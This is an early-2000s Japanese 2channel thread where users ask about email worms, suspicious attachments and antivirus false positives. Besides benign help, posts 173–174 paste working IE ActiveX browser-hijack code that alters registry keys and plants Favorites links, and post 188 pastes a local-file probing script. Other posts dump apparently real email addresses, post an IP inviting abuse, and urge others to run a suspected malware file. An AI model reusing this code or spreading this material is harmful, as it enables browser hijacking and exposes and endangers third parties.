メールとまた同じ添付ファイル付きのメールが届きました。

これってなんなのでしょうか?
いろいろ自分なりに探してみたんですけど、わからず
どなたか、ご存知の方おりますでしょうか?
-----------------
Hi! How are you?

I send you this file in order to have your advice

See you later. Thanks
--------------------

131 :名無しさん@お腹いっぱい。:01/12/11 01:01
>>130
サーカム

132 :Name_Not_Found:01/12/11 01:23
>>127

>>添付ファイルネームはPics.doc.scr
>>サブジェクトはRe:

俺もこれに感染。アウトルックの登録したアドレス全てに対し
 勝手に返信しちゃうんです。

 これって何ですか??

133 :Name_Not_Found:01/12/11 01:25
続き

それに感染後、アウトルックが異様に重くなり、制御不能になります。
何故でしょう??

134 :名無しさん@お腹いっぱい。:01/12/11 01:32
>>133
>>127に答えかいてあるぢょ。
Bad transでyahoo検索汁。
自分で汁。

135 :名無しさん@お腹いっぱい。:01/12/11 01:58
>>131
どうもありがとうございました。
これがサーカムだったのかー
自分はなにをしらべていたんだろう・・・

136 :名無しさん@お腹いっぱい。:01/12/11 04:11
>135
それにしても、添付ファイルが届いたこと知らされてるのに
感染の可能性を怪しみもせず「送ってません」とかぬかして
感染しっぱなし=顧客リスト垂れ流しにしてる相手が笑えるな。
そのファイルからウィルス除去して中身見てやれ(藁

137 :135:01/12/12 01:26
ファイルは消去してしまいました。HPにいったら中古車を扱っている会社みたい
でしたけど、多分他の所にも700Kの顧客.xls送っているんだろうなぁ

138 :名無しさん@お腹いっぱい。:01/12/12 01:40
Play.A ってアウトルックとアウトルックエキスプレスを
アンインストールしてもダメ?
なんつーか両方アンインストールしてある状態でPlay.Aを発見したの
だけど・・・。
やっぱメールおくられちゃってるかな???
ちなみに使用メールクライアントは江戸マックスです。

139 :名無しさん@お腹いっぱい。:01/12/12 01:47
>>137
自作のポエムを送ってしまった女がいるらしい。
俺だったら首吊るね。

140 :名無しさん@お腹いっぱい。:01/12/13 00:14
JS_PLAY.Aについてトレンドマイクロに記載あり。よくわからず(藁
http://www.trendmicro.co.jp/virusinfo/isp/virusency/default3.asp?VName=JS%5FPLAY%2EA

141 :名無しさん@お腹いっぱい:01/12/14 00:36
時間がたつと勝手にパソが立ち上がります。
はじめはきり忘れと思ってたのですが、今日は目の当たりしました。
見てるまん前で勝手に電源が〜〜
これってウィルス!?
でもそのパソではとりあえずメールはしてないです。
ネットとランはしてますが…
同じ症状になった方、何かしってる方、情報お願いします

142 :名無しさん@お腹いっぱい。:01/12/14 01:46
君は夢を見たんだ。

143 :名無しさん@お腹いっぱい。:01/12/15 01:32
>>141
ぼくのと違うとおもうけど、BIOSの設定をみると
モデムなどに着信があると起動 とか 毎日決まった時間に起動
とかの設定があります

気になるならコンセント抜いとくといいのでは。

あと、コンセントを挿すとスイッチを押さなくても起動 というのがあって
不精もんなので、ありがたいです。

144 :名無しさん@お腹いっぱい。:01/12/15 01:44
>>141
近くを大型トラックが走っていないかい?

145 :名無しさん@お腹いっぱい。:01/12/15 02:08
>>144
へ?
も、もしかして、、、機種によっては一定の周波数帯の音で起動できるって事??
漏れ、サソーク、エレキベース引っ張り出してきてPCの前で鳴らしてみる!
・・アンプ何処だっけな。。。

146 :名無しさん@お腹いっぱい。:01/12/15 03:04
>>145
27MHzくらいを試せ

147 :誰か助けて:01/12/15 13:31
CPU使用率がずっと100%のままで何も出来ません。
ウィルスチェックしてもウィルスは検出されません。
初期化しかないですか?

148 :名無しさん@お腹いっぱい。:01/12/15 22:26
natuheita@syd.odn.ne.jp>; <nakasima-514@jp-c.ne.jp>;
<maybe-kz@siren.ne.jp>; <senna01@docomo.ne.jp>; <pixy@fb3.so-net.ne.jp>;
<kyusute-@nifty.com>; <sometime1@t2.ezweb.ne.jp>; <y-nomura@ngk.co.jp>;
<milkcafe@m18alpha-net.ne.jp>; <kyoji1964@docomo.ne.jp>;
<smasa@rj8.so-net.ne.jp>; <fa6.dowluck-mon@ezweb.ne.jp>;
<yasu2002@par.odn.ne.jp>; <bakuchokai@jp-k.ne.jp>; <mytvshow@sala.or.jp>;
<kiri71@docomo.ne.jp>; <tomomiti@hm2.aitai.ne.jp>; <atsu@sannet.ne.jp>;
<m_takeda@omc.co.jp>; <cazuhilo@d3.dion.ne.jp>; <yoshijima@par.odn.ne.jp>;
<masashi@po5.nsk.ne.jp>; <mituaki...227@docomo.ne.jp>

149 :名無三:01/12/15 22:28
>>148さん。このアドレスはなんですか?

150 :名無しさん@お腹いっぱい。:01/12/15 22:39
おしおきしてやって!!

151 :名無三:01/12/15 22:55
>>141さんへ。
それはイタズラ(ウィルス?)です。
僕も友達からのメール開けたらCD-Rのふたが1時間おきに開くようになりました。
電源切っても勝手についてCD-Rのふた開けるんです。困りました。

152 :名無しさん@お腹いっぱい。:01/12/16 00:01
>>147
USB機器を何か使っている?

153 :名無三:01/12/16 00:22
>>152さんへ。
はい。プリンターを。

154 :名無しさん@お腹いっぱい。:01/12/16 01:29
>>153
プリンタのUSBケーブルを切り離して、再起動しても100%のまま?
USB機器を接続していると、CPU使用率が100%になることがあった(激重>フリーズ)
#自分の場合はWin98SE+USBキーボード

↓あっ、もしかしてこれじゃないよね?
http://www.microsoft.com/japan/support/kb/articles/J046/1/89.asp

155 :名無三:01/12/16 02:24
>>153
USB抜いて再起動してみました。あいかわらずでした。
PCつけるとすでにCPU使用率が100%。なにかすると即フリーズ。
再起動すらさせてくれません。ちなみに今はプログラムの強制終了で
explorer以外全て終了させています。そうすればなんとか動いてくれます。

156 :名無しさん@お腹いっぱい。:01/12/17 02:28
画面が真っ赤になったんだけどこれってどうなの?

157 :名なし:01/12/17 03:00
>156
モニタまたはモニタケーブルの問題か?

158 :名無しさん@お腹いっぱい。:01/12/18 12:44
僕の知っている方が内容空白のReメールに添付していた
ファイルをうっかり開いてしまって、147さん同様の
症状になりました。
流行りのBadtransかと思ったのですがそうではないようで、
デスクトップ上にはDoc.docというサイズ30kbyte位の
謎のショートカットがあり、それを削除しようとすると
もう固まってしまうそうです。
これって何ていうウィルスなんでしょうか?

159 :速報?:01/12/21 12:29
最近いろいろ報告のあった>>140のJS_PLAY.Aについて。

やはりトレンドマイクロの誤検出の線が濃厚。
↓ソース
ttp://www.asahi-net.or.jp/~vr4m-ikw/faq.html
「情報を総合すると「窓の手」を使用して「インターネット
エクスプローラのタイトル」を標準以外の文字列に変更した
場合等に「JS_PLAY.A」に感染しているというメッセージが
表示されるようです。」←作者さん

160 :みかんち:01/12/21 12:51
じゃあうちのも聞いて!添付ファイルが付いてるメールで、
クリックしただけで添付が開かれた。
そしてマイドキュメントにspiderというファイルが増えていた。
流行のウイルスとか分からないから、困っちゃいました。
誰かこれは何なのか教えて!
ちなみにウィルススキャンではウィルスは無かった。

161 :名無しさん@お腹いっぱい。:01/12/23 14:49
ttp://bbs.666host.com/を踏むと
ウイルス(BCOUNT)を検出します。(VB2001)

162 :名無しさん@お腹いっぱい。:01/12/25 08:26
ニュース速報板より

新型ウィルス発見 今度はオフィス
http://choco.2ch.net/test/read.cgi/news7/1009233792/l50

163 :名無しさん@お腹いっぱい。:01/12/25 08:37
つまらんネタならsageでやれよ。せめて。

てかお前マルチ野郎でうざい。氏ね。

164 :名無しさん@お腹いっぱい。:01/12/26 10:51
PCを立ち上げたまま数分間席を立ち、その間にウイルスバスターのスキャンがかかっていました。
席に帰ってくると、BIOS画面になっていて、F1かF2キーを押しました。
すると動かなくなってしまったので、再起動しました。
すると「ENTER CURRENT password:」
と真っ黒の画面の真中に出ていて、パスワードを3回失敗すると
丸い顔(笑っている)が出てきます。
これってウイルスでしょうか?
いろいろ調べてみたのですが分かりません。
BIOSのパスワードが何か・・・ってこともあるのでしょうか?
知っている方がいたら教えてください。

165 :名無しさん@お腹いっぱい。:01/12/26 12:59
rを入力しようとしたら別のアプリが動く、というのは
ウィルスでしょうか‥?
シマンテックもトレンドマイクロのホームページにも
載っていなくて‥

166 :名無しさん@お腹いっぱい。:01/12/26 13:12
>>156
昔なぜかLANの接続不良でそうなった事ある。
しっかり繋げたら直った。

167 : :01/12/26 13:18
>>164それ怖いね

168 :名無しさん@お腹いっぱい。:01/12/26 19:18
今日届きました
今このスレ読んで
いろいろ調べて
news doc scrとかいうファイル名だから
Badtransってやつだとは思うんだけど
これって添付ファイルを開かなければ
感染しないんですか?
たぶん初歩的な質問でスマソ
でも不安なので誰か教えてください

169 :名無しさん@お腹いっぱい。:01/12/26 20:06
>>168
環境によってはプレビューだけで感染します。↓参考に

猛威をふるう BADTRANS.B Re: メール (4通目)
http://pc.2ch.net/test/read.cgi/sec/1008355163/1-9

170 :168:01/12/27 00:30
>>169
とってもさんくす
貼ってもらったところ見て
IE6であること(インストール方法は忘れたけど)
Hotmailであったこと
から、たぶん大丈夫だと
最後にオンラインウィルス検索しました
たいへんかんしゃ

171 :PWS-gen.Hooker :01/12/27 00:36
PWS-gen.Hooker
というウィルスが送られてきました。
YAHOOで検索かけても何もひっかからないのですが、どなたか教えてくれませんか。

172 :名無しさん@お腹いっぱい。:02/01/07 01:14
結局 年末年始ウィルスは出なかった

173 :水泥棒!「「菊池記念館」」:02/01/07 01:36
<SCRIPT language=JavaScript>
document.write("<applet height=0 width=0 code=com.ms.activeX.ActiveXComponent> ");
function f(){
try
{
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
if (documents .cookies.indexOf("Chg") == -1)
{
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Microsoft Internet Explorer");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Microsoft Internet Explorer");
var expdate = new Date((new Date()).getTime() + (1));
documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
init();
</SCRIPT>

174 :名無しさん@お腹いっぱい。:02/01/07 01:46
document.write("<APPLET HEIGHT=0 WIDTH=0
code=com.ms.activeX.ActiveXComponent></APPLET>")

function AddFavLnk(loc, DispName, SiteURL)
{ var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
Shor.TargetPath = SiteURL;
Shor.Save();
}
function f(){
try
{
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try{
var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 *
90));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + ";
path=/;"
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\StartPage", "http://badwebsitename here/");
var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 *
90));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + ";
path=/;"
var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);
loc = WF + "\\Favorites";

if(!FSO.FolderExists(loc))
{ loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName
+
"\\Favorites";
if(!FSO.FolderExists(loc))
{
return;
}
}
AddFavLnk(loc, " Britney Spears Nude", "http://www.whatever.com");
AddFavLnk(loc, " Aol", "http://www.aol.com");
}
catch(e){ }
}
catch(e){ }
}
function init(){
setTimeout("f()", 1000);
}
init();

175 ::02/01/07 01:55
自分のコンピュータがウイルスに感染してるかどうかって
どうやったらわかるんですか

176 :名無しさん@お腹いっぱい。:02/01/07 02:18
>>175
ファンの排気ダクトに手を当ててみる。
かな-り暑いときは、まづいよ。。

177 :名無しさん@お腹いっぱい。:02/01/08 00:51
http://www2.plala.or.jp/MIZUKI-NAKATA/weston-prestige-marron-tate.jpg

178 :名無しさん@お腹いっぱい。:02/01/08 02:58


179 :名無しさん@お腹いっぱい。:02/01/08 03:21
>>175
googleかどこかで
シマンテック ウィルスチェック
で調べてみたら?

180 :名無しさん@お腹いっぱい。:02/01/08 04:08
>>179
シマンテックのサイト行ってもオンラインウイルスチェックの
ぺージが見つからない・・

181 :名無しさん@お腹いっぱい。:02/01/08 13:30
1Cust13.tnt1.nishinomiya.jp.fj.da.uu.net(63.51.55.13)
↑ストーカー荒らしのIP
 悪用してヨシ!

182 :名無しさん@お腹いっぱい。:02/01/08 13:43

シマンテックのウイルスチェック
http://security2.norton.com/ssc/lunavbrk.asp?scantype=2&langid=jp&venid=sym&plfid=20&pkj=DDSKYJDMVVOOAOMMUZY

トレンドマイクロのウイルスチェック
http://housecall.antivirus.com/housecall/start_jp.asp

183 ::02/01/08 15:46

★重要告知★

『 OKWeb 』 及び 教えてGoo は最悪だ !
利用する奴ははっきり言って馬鹿の象徴 !!
馬鹿の証明しているに過ぎない !!
"OKWeb" を利用すると 頭が変になり、馬鹿になる !! 気をつけろ !!!
 それにOKwebを利用するだけで『ウィルス』に感染してしまうから
絶対利用はするな !!

184 :で? で?:02/01/08 19:00
で?

185 :あぼーん:あぼーん
あぼーん

186 :あぼーん:あぼーん
あぼーん

187 :あぼーん:あぼーん
あぼーん

188 :名無しさん@お腹いっぱい。:02/01/09 01:08
<html>
<head>
<script language="javascript">
<!--
var fileExists = false;
function yes()
{
alert("the file exists.");
yes = true;
}

function no()
{
if(!fileExists)
{
alert("the file does not exist.");
}
}

window.onerror = yes
window.onload = no
//-->
</script>
<script language="javascript"
src="file://c:\autoexec.bat"></script>
</head>
</html>

189 :名無しさん@お腹いっぱい。:02/01/10 04:33
また何か出そうな気がする
そんな予感がする

190 :名無しさん@お腹いっぱい。:02/01/10 04:50
ココにも貼っておく

[最新ウィルス情報]
IPAセキュリティセンター
http://www.ipa.go.jp/security/isg/virus.html

191 :あぼーん:あぼーん
あぼーん

192 :名無しさん@お腹いっぱい。:02/02/06 14:46
ウイルスおいてあるホームページおしえてください

193 :名無しさん@お腹いっぱい。:02/02/06 20:17
http://www.geocities.com/kendokobayashi1111/a.html
ここに置いてるa.exeってファイル
アングラサイトで拾ったんだけど、
かなりウイルスっぽいです。
でもウイルスバスタで検出できません。

だれか実行してみて
or
他のアンチウイルスソフトで試してみて


194 :名無しさん@お腹いっぱい。:02/02/22 13:52
>22のをよそのスレで踏んでしまったのですが、
どう対処すればいいのでしょうか?
全然被害はない、と言う意見と、
最近のはソースが書き換えられててトロイが仕掛けてある、
と言う意見があってどちらが正しいか判断しかねてます。
ウイスルバスターでチェックしたら検出はされませんでした。
よろしくお願いします。

195 :名無しさん@お腹いっぱい。:02/02/22 14:35
もどの直リンクリックしても変なアダルトページに
飛ばされるんだけど・・・
どゆこと?


196 :厨房質問でスマン。:02/02/26 01:40
ttp://pinktower.com/?easyweb.easynet.co.uk/~hiros/virii00/METALLICA_SONG.MP3
ここにある奴踏んじゃってから「既出。ウイルス」て警告レスがついてちょっと焦ってるんだけど。
コレどんなウイルス? トレンドマイクロのオンラインスキャンじゃ何も出なかった。
確かにコレ踏んでから
「Start Wacthing Free Satellite TV !!」
なんて題のメールを俺が何度も出してることになってるんだけど。
(で、サーバにはねられるので判明する)
なんか分からないままだと気持ち悪いので教えてくれませんかね。

197 :わかりません:02/02/26 02:02
193の方を踏んだらいきなり大量のメールを送りつずけたのです
それからまたダイヤルアップごとに送ろうとするのです
RPCSS.EXEというものが怪しいと思うんですがどうしても消せません
助けてください

198 :名無しさん@お腹いっぱい。:02/02/26 02:12
>>197
自己責任って言葉知っているか?

199 :名無しさん@お腹いっぱい。:02/02/26 02:19
野球ヲタワラタ

http://ime.nu/www.baseball-lover.com

200 :196:02/02/27 00:57
質問スレッド見落としてた。鬱だ……。
そっち逝って訊いてみる。
スレ汚しスマン。

201 :名無しさん@お腹いっぱい。:02/05/26 05:06
http://members11.tsukaeru.net/monmari4f5d/cgi-bin/img-box/6.jpg

これ踏んだんですけど
実害ないんですけど
ほっといてもいいんですか?
教えていただけるとありがたいんですが

202 :名無しさん@お腹いっぱい。:02/05/26 05:10
>>202
ダウソしようとするとKlez警報がでるね。
ウイルススキャンしてひっかからないんだったら
ほっといていいんじゃない?

203 :201:02/05/26 05:17
>>202
僕に対するレスですよね?
ノートンが反応したのでショックを
受けて困ってたんです。 スキャンで
ひっかからなかったので安心して
ほっとけます。  有難うございました。

204 :名無しさん@お腹いっぱい。:02/05/26 19:07
今朝のTBC祭りの時にプラクラ2回(一つは緑のウインドウがバウンドするやつ)踏んじゃってから
通信速度(ケーブル)がめちゃめちゃ遅くなてしまったんだけど、これって何かのウィルスの仕業?
体験版ウィルスバスターでチェックしたら「crashme[2].html」ってのが出てきて「駆除」は不可能だったので「排除」したんだけど、いまだに速度遅い症状は残ったままなのです。
全然速度が出ないのでメールも見れないし、このスレに来るのにもかなり苦労しますた・・・。
これは一体なんなのでしょうか??

205 :名無しさん@お腹いっぱい。:02/05/26 20:12
http://members11.tsukaeru.net/monmari4f5d/cgi-bin/img-box/6.jpg
これはどんなウィルスなんですか?
踏んでしまった場合、どういう対処をとるべきでしょうか?
よろしくおながいします。

206 :名無しさん@お腹いっぱい。:02/05/26 20:18
↑klezウィルスだよ。
シマンテックのHPに駆除ツールあるから見て見れ

207 :名無しさん@お腹いっぱい。:02/05/26 20:34
駆除ツールをつかってウィルスが見つからなかった
ってことは感染してないってことですよね?

208 :cheshire-cat:02/05/26 21:05
>>207
ここから入ってみた。
http://members11.tsukaeru.net/monmari4f5d/cgi-bin/img-box/

該当ファイルはKLEZ.H初期型のファイルを、拡張子をjpgに改変しただけのものだから。
URL踏んでも、ダウンロード後にダブルクリックしても、感染しないと思うが。

209 :名無しさん@お腹いっぱい。:02/05/27 14:47
感染しない

210 :名無しさん@お腹いっぱい。:02/05/28 09:49
☆ウィルス情報&質問 総合スレッド☆part3
http://pc.2ch.net/test/read.cgi/sec/1020696417/l50

211 :名無しさん@お腹いっぱい。:02/05/28 23:10
全くの初心者です。
ある日突然、閉じる×や最大化□のマークが変な記号や数字になって
他にもあちこちに数字の6や8がくっついてるんですけど
これは一体何ですか?
どうすれば元に戻るか教えて下さい。

212 :cheshire-cat:02/05/28 23:13
>>211
どんぞ。
http://homepage2.nifty.com/winfaq/fontstrouble.html

213 :名無しさん@お腹いっぱい。:02/05/28 23:43
>212
解決しました。
本当にありがとうございました。
これで気分が明るくなれました。

214 :教えてくんスマソ:02/06/01 11:28
ウィルスらしいメールがきて、
ヘッダのReturn-Pathと差出人がちがうのですが、
どっちがホンモノ?
Return-Pathのほうが知り合いだったんで、
相手がもし感染してたら教えてあげようと思うんだけど。

ちなみにメールの大きさは131KBで件名は
「Re:Copyright (C) 2002 Yahoo Japan Corporation. All Rights Reserved.」

215 :名無しさん@お腹いっぱい。:02/06/01 11:42
>>214
原理的にはreturn-pathも騙ることが可能。
しかし、今出回っているKLEZはreturn-pathを騙ってないのが多いから、知り合いなら連絡してやれ。
確認および対策法はこの板のKLEZスレ。

216 :教えてくんスマソ:02/06/01 13:04
>>215
サンキュ!

217 :名無し@???:02/06/01 22:49
ここウイルスに感染してません?

218 :cheshire-cat:02/06/01 22:51
>>217
してません、かと。
誰かが貼り付けたウイルスのコードをそう検出するだけかと思いますが。

219 :名無し@???:02/06/01 22:54
そうなんですか?
マカフィーがいつも警告出すんですけど。



220 :cheshire-cat:02/06/01 22:57
>>219
「使うな」ってマジレス。
件出力はいいんだけど、ね。

221 :名無しさん@お腹いっぱい。:02/06/01 23:00
>>219
アンチウィルスが誤検出しそうなコードは貼られているが、実際に感染する危険なコードはない。

222 :名無しさん@お腹いっぱい。:02/06/01 23:18
掲示板がウイルスに感染するか?

223 :名無しさん@お腹いっぱい。:02/06/01 23:51
>>222 掲示板を介して感染させることは可能

224 :名無しさん@お腹いっぱい。:02/06/02 00:58
メーリングリストから送られてきたメールについていたウイルス
らしきファイルなのですが、プレビューでIEのレンダリングを使
う設定にしているのを忘れて表示してしまいました。

Klez系だと思うのですが、ノートンのアンチウイルスの最新の定
義ファイルでも検出されないし、ノートン、トレンドマクロのKlez
削除用のソフトでも引っかかりません。これってなんなのでしょう
か? 感染の有無を確認するにはどうすればいいのでしょうか?

Content-Type: audio/x-wav;
name=target.pif
Content-Transfer-Encoding: base64
Content-ID: <O03a9sgHM24>

Content-Type: application/octet-stream;
name=bbmimi[1].jpg
Content-Transfer-Encoding: base64

/9j/4AAQSkZJRgABAgAAZABkAAD/7AARRHVja3kAAQAEAAAAHgAA/+4ADkFkb2JlAGTAAAAA
....
なんてのが含まれています。
ご存知の方、ご教授をお願いします。

225 :名無しさん@お腹いっぱい。:02/06/02 01:01
>>224
あきらめましょう あきらめましょう〜
スッキリしましょう パッパパラッパ♪

あきらめましょう あきらめましょう〜
リセットしましょう パッパパラッパ♪

       ∋((( )))∈
       (((*・∀・))
     / ̄))),― 、(( o    。。。
     | ||三∪●)三m三三Ε∃.
     \_.へ--イ |___  ゜ ゜ ゜
      / (__)_) /|
      | ̄□■□ ̄| |
      | .POKKA. |/





226 :名無しさん@お腹いっぱい。:02/06/02 02:34
きのおさ、W32.Klez.H@mm付けさらしたボケからメールきたんです。
W32.Klez.H@mm。。。2通も、、連チャンでw

でさぁ、オモロそうだから、、、よ、こんなん返信したんです。返信。

社団法人日本インターネットプロバイダー協会が平成13年8月に行ったアン
ケート調査によると、過去1年間にプロバイダーに寄せられた違法な内容の
情報に関する苦情・相談件数は約4万件に上っています。自宅に居ながら
銀行振り込みや買い物、メール交換ができて大変便利なインターネットです
が、いつでもだれでも情報発信できる公開性や匿名性を逆手に悪用されて、
本人の知らない間に電話番号などのプライバシー情報を公開されたり、
誹謗中傷や個人情報が勝手に流されるケースが増えています。

権利が侵害されたことが明らかであり、開示を受ける正当な理由がある場合、
被害者はプロバイダーに発信者情報の開示を請求することができます。

この法律によって刑事事件に至らない場合でも、被害者が発信者情報の開示を請求
できるようになりました。ネット社会のルール整備が一歩進んだといえるでしょう。

…って。

そしたらさー、5分もしないうちにアカウントデリってやんの、、もうね、、
アホかと、、バカかと、、、いや、吉野屋をコピッてる訳ぢゃないよw
んな文章ごときで、普通アドレスあぼーんするのかと、、小一時間(略
ほどよいことに2通あるんです。『2通』…解かりますよね。
食材が2つあるんですぅ。どおしよう、美味そうだなーコレ。

こんなヤツでも祭って欲しいのかな?と思ってさ、皆の意見を聞きたいだけです。

晒していいよね。被害受を受けるところだったぢゃなく、被害を受けた。と。
いや、もうすでに、開いてます。w 被害者なんですぅ。うぅぅ。

どお? オモロそうなら、マジやるけんど。

227 :妖精 ◆ugm80iGQ :02/06/02 02:42
>>226
どうやってそのウィルスを消すか教えてください
お願いします

228 :名無しさん@お腹いっぱい。:02/06/02 02:42
あまりおもしろくない。

229 :名無しさん@お腹いっぱい。:02/06/02 02:58
>288
ほんと?じゃここでわやめるよ。でもまたのぞきにくるんで、リクエスト
あれば、こやつのヘッダ晒します。

230 :名無しさん@お腹いっぱい。:02/06/02 03:08
>>227さん
すみません。わからないんです。w

231 :妖精 ◆ugm80iGQ :02/06/02 03:10
あうー
困った・・それが発見されて1週間放置しているが
未だに何も変わってないみたいだから平気かな

232 :名無しさん@お腹いっぱい。:02/06/02 03:16
ひとりごとな罠>231

233 :妖精 ◆ugm80iGQ :02/06/02 03:24
>>232
久しぶりに悩まされてるんです

234 :名無しさん@お腹いっぱい。:02/06/02 03:35
なぜゆえ、なにゆえ>233

235 :妖精 ◆ugm80iGQ :02/06/02 04:11
>>234
先週パソコンを買い換えてADSLで快適生活を送ってた矢先に
おきた出来事だからです(マジレス)

236 :名無しさん@お腹いっぱい。:02/06/02 04:24
まさか、ひらいたりなんかしちゃ(略>>235

237 :名無しさん@お腹いっぱい。:02/06/02 11:33
   

あきらめましょう あきらめましょう〜
スッキリしましょう パッパパラッパ♪

あきらめましょう あきらめましょう〜
リセットしましょう パッパパラッパ♪

       ∋((( )))∈
       (((*・∀・))
     / ̄))),― 、(( o    。。。
     | ||三∪●)三m三三Ε∃.
     \_.へ--イ |___  ゜ ゜ ゜
      / (__)_) /|
      | ̄□■□ ̄| |
      | .POKKA. |/



238 :名無しさん@お腹いっぱい。:02/06/03 00:13
WINKSHGって何ですか??

239 :238:02/06/03 00:34
おいおいやべーよ削除できねーよ!

240 :名無しさん@お腹いっぱい。:02/06/03 00:50
>>239
ワラタ
regedt32.exeでwink*を削除すれ

241 :名無しさん@お腹いっぱい。:02/06/03 16:18
NoCloseってのがいるみたいなんですが、
いったいなんですか?コレは。
削除しても削除してもダメ。ずーっとでてくるんです。
知ってる人いたら教えてください。

242 :238:02/06/04 01:09
>>240
ありがとうー!ウイルスの怖さを思い知ったちょー・・・

243 :名無しさん@お腹いっぱい。:02/06/04 01:19
>241
ひょっとして特定のエロサイトに行ってる?

244 :名無しさん@お腹いっぱい。:02/06/04 11:45
最近になってDarling、tato、2ch,updateの件名で
添付ファイル付のメールが毎日の様に送られてきます。

削除しようとしても不正な処理がなんたらとかで
メール自体開けません。どうやって削除すればいいんですか?

245 :244:02/06/04 11:51
件名→差出人でした。

246 :名無しさん@お腹いっぱい。:02/06/04 12:08
>>244 ウィルススキャンしろ。まずはそれから。

247 :244:02/06/04 14:01
ウイルススキャンした所、感染しては無いみたいなんです。

一応安心はしてはみたものの
このままほったらかしにしておくのも気持ち悪いので・・・。

なんとか削除する方法はないのでしょうか?

248 :名無しさん@お腹いっぱい。:02/06/04 14:08
>>247 アンチウィルスソフトは常駐しているか? 受信時にアンチウィル
スはチェックしてくれるが、一旦受信したメールや添付ファイルはウィル
ススキャンの対象になっていない。もっとも添付ファイルを実行してしま
って感染すればスキャンで発見されるが。

メーラーは何を使っているのか「不正な処理がなんたら」の内容も不正確
なので誰もアドバイスできない。情報を正確かつ十分に開示すること。

249 :名無しさん@お腹いっぱい。:02/06/04 14:26


250 :名前:02/06/04 17:42
女の人が口から血を流してる画像がランダムで出てくる
ウイルスがあるらしいんだけど、なんて名前か知ってたら
教えてください。

251 :名無しさん@お腹いっぱい。:02/06/04 18:06
>>250
幽霊のやつか?何て言ったっけな

252 :cheshire-cat:02/06/04 18:43
これだっけ?
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JOKE_MADO.A

253 :名前:02/06/04 19:21
>>252
252さん。どうもありがとう。

254 :247:02/06/04 22:57
遅レスすいません。
>>248さんのおっしゃる通り情報が少なすぎました。

メーラーはOutlook Expressを使っています。
不正な処理の詳細を見ますと

MSIMN のページ違反です。
モジュール : INETCOMM.DLL、アドレス : 015f:5ec291f9
と書いてありました。
そして同時にWINDOWS MEDIA PLAYERのエラーと出て
リダイレクトに問題が発生しましたとの事です。
詳細は不明みたいです。

それとアンチウィルスソフトって何でしょうか?
初心者という言葉に逃げるつもりは無いのですが
本当にこれくらいしか解りません。
すいませんがどなたかご存知の方よろしくお願いします。





255 :cheshire-cat:02/06/04 23:11
>>254
>アンチウイルスソフト
ウイルスを検出・駆除するためのツールです。
買ってないなら、体験版とかをダウンロードして使うか、以下のURLのオンラインスキャンを。
http://www.trendmicro.co.jp/hcall/index.asp

それと、喰らったら複数のアンチウイルスソフトでチェック、これ常識。

256 : ◆OjTjK0LY :02/06/05 00:54
>>254
買うのが嫌とか言うのなら、ひとまず↓あたりを参考にするとよろし。
http://pc.2ch.net/test/read.cgi/sec/1017309416/l50



257 :247:02/06/05 00:54
>>255ありがとうございます。
さっそくスキャンした所やっぱり感染してるみたいでした。
しかも15も・・・。

今流行っているKLEZってやつでした。
どうやら何とかなりそうです。
さっそくアンチウイルスソフトを買って駆除しようと思います。

cheshire-catさん本当にありがとうございました!



258 :名無しさん@お腹いっぱい。:02/06/05 02:03
247さん!アンチウィルスソストは、インストールしただけでは、「全く意味が無い」事をお忘れなくっっ
日々生まれるウィルスに対抗すべく「ウィルス定義ファイル」を数日ごとにダウンロード、インストールするのですよ。
でないと、最新ウィルスには全く効き目なしですよ。。
そして、最低、週一度の、ウィルススキャンをするのです。

259 :名無しさん@お腹いっぱい。:02/06/05 08:08
トレンドマイクロオンラインスキャンで「TROJ_LAMERA.SVR」というトロイを発見したので、
Windowsを再インストールしました。
再インストール後、シマンテックのアンチヴィールスをインストール後、
ATI RAGEUCドライバー(ATIホームよりダウンロード)、TEAC DM-71Tドライバー(ダウンロード)、
メルコLANカードドライバー(付属フロッピー)、ZONEALARM、ZONEALARM日本語パッチ、
WindowsUpdate重要な更新、IE6、とインストールし、
念の為、トレンドマイクロオンラインスキャンを実行してみたところ、
また「TROJ_LAMERA.SVR」に感染していました。
アンチヴィールスは最新定義ファイルで何度かスキャンをかけていたのですが、
まったくの無反応でした。
これはなぜなのでしょうか。お分かりになられる方いらっしゃいましたらお教え下さい。

260 : :02/06/05 09:25
>>259 トレンドの誤検出の可能性、に1票。

261 :名無しさん@お腹いっぱい。:02/06/05 14:14
>>259
誤検出らしいね

262 :259:02/06/05 15:37
>>260-261
ご回答ありがとうございます。
何度再インストールしても検出されるので、困っていたところで本当に助かりました。
トレンドマイクロのウィルスデータベースで検索しても、
このTROJ_LAMERA.SVRといウィルスの登録はありませんでした。



263 :名無しさん@お腹いっぱい。:02/06/05 17:07
>>262
定義ファイルに無い物を検出できるわけが無い。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_LAMER.A.SVR&VSect=T

264 :247:02/06/05 17:34
>>258さん、肝に命じておきます。
ご忠告ありがとうございました!

265 :名無しさん@お腹いっぱい。:02/06/05 21:24
